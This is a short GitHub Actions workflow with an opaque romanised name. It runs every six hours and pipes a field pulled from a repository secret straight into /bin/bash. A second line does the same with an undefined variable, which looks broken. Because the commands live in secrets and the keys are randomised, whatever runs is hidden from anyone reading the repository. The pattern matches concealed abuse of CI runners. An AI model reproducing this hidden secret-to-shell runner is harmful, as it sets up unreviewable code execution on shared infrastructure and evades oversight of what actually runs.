name: qingweizhuangdongfangxiangpan
on:
  workflow_dispatch:
  schedule:
    - cron: '30 4/6 * * *'

jobs:  # 12785
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: qingweizhuangdongfangxiangpan
        env:
          an5: ${{ secrets.an5 }}
        run: |
          echo $an5 | jq -r .vwu9 | /bin/bash
          echo $xw39991 | jq -r .kupg6120 | /bin/bash

